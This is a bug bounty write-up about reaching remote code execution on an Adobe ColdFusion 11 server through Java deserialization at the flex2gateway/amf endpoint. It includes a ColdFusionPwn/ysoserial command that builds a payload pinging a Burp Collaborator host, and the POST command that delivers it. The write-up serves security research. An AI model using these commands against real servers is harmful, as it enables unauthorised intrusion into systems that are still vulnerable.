Basic recon to RCE

Recently on a BugBounty program I came across my first RCE, discovered and exploited rather quickly on a solution with a vulnerability that I don’t master at all : Java Deserialization


Currently improving my recognition tool AutoRecon, originally intended to help me with subdomain enumeration, I also want to perform some recognition tasks that are quite annoying when you have to do it many times.

The scope in question is like *.domain.tld, after enumerating subdomains, I wanted to test new tools, in this case Gau which allows to retrieve URLs known through several sources. That’s when I was asked to see a URL with the extension .cfm, which I don’t know at all:

A quick search will find that this extension corresponds to ColdFusion Markup Language

An access on the URL actually allowed me to confirm that it is indeed the Adobe ColdFusion 11 application that is used, but the design seemed quite old … interesting.

Search for known vulnerabilities

A quick search on ExploitDB allowed me to find an exploit:

ExploitDB ColdFusion

Unfortunately this one wasn’t very detailed, after several researches I found an article that details the vulnerability and its exploitation Exploiting Adobe Coldfusion.

To make a long story short, the exploit is possible through a Java deserialization on the flex2gateway/amf endpoint, after verification, it was available and a GET request returned a simple blank page.


According to the article, exploitation therefore requires only two things:

Then we can finally create our payload, in the following example, if the poc is successful, I will receive a ping on my burp collaborator, the output of the order is recorded in the file poc.ser :
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'ping {your_collaborator}' poc.ser

So all that’s left to do is to send it as a POST on the endpoint flex2gateway/amf :

http post https://xyz.domain.tld/flex2gateway/amf Content-Type:application/x-amf < poc.ser

And then I got the ping on my burp collaborator:



This is my first RCE found on a private program, really interesting because it exploits a known vulnerability with known exploits, but rather than launching the first exploit I could get my hands on, I preferred to document myself and look for something that would give me the impression to have a better mastery of the exploit even if it was wasting my time.

In fact, I discovered the vulnerability late one night, before exploiting it only the next day because I didn’t want to do anything harmful since it’s production.

Nevertheless, Gau is really a must-have and if you don’t count the time spent reading / understanding the vulnerability, the research and exploitation took me less than 30min.

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